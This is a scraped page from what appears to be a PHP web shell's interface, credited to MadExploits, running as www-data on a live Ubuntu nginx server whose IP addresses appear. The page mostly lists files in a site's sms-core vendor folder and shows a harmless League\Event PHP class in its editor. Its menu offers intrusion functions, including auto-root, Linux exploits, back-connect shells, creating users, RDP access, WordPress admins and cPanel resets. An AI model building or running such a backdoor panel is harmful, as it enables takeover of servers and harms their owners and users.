Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
vendor /
league /
event /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
AbstractEvent.php
988
B
-rw-rw-r--
AbstractListener.php
222
B
-rw-rw-r--
BufferedEmitter.php
811
B
-rw-rw-r--
CallbackListener.php
1.14
KB
-rw-rw-r--
Emitter.php
6.01
KB
-rw-rw-r--
EmitterAwareInterface.php
363
B
-rw-rw-r--
EmitterAwareTrait.php
669
B
-rw-rw-r--
EmitterInterface.php
2.19
KB
-rw-rw-r--
EmitterTrait.php
2.87
KB
-rw-rw-r--
Event.php
631
B
-rw-rw-r--
EventInterface.php
702
B
-rw-rw-r--
Generator.php
141
B
-rw-rw-r--
GeneratorInterface.php
194
B
-rw-rw-r--
GeneratorTrait.php
627
B
-rw-rw-r--
ListenerAcceptor.php
843
B
-rw-rw-r--
ListenerAcceptorInterface.php
1.53
KB
-rw-rw-r--
ListenerInterface.php
407
B
-rw-rw-r--
ListenerProviderInterface.php
285
B
-rw-rw-r--
OneTimeListener.php
1.15
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractEvent.php
<?php namespace League\Event; abstract class AbstractEvent implements EventInterface { /** * Has propagation stopped? * * @var bool */ protected $propagationStopped = false; /** * The emitter instance. * * @var EmitterInterface|null */ protected $emitter; /** * @inheritdoc */ public function setEmitter(EmitterInterface $emitter) { $this->emitter = $emitter; return $this; } /** * @inheritdoc */ public function getEmitter() { return $this->emitter; } /** * @inheritdoc */ public function stopPropagation() { $this->propagationStopped = true; return $this; } /** * @inheritdoc */ public function isPropagationStopped() { return $this->propagationStopped; } /** * @inheritdoc */ public function getName() { return get_class($this); } }
Close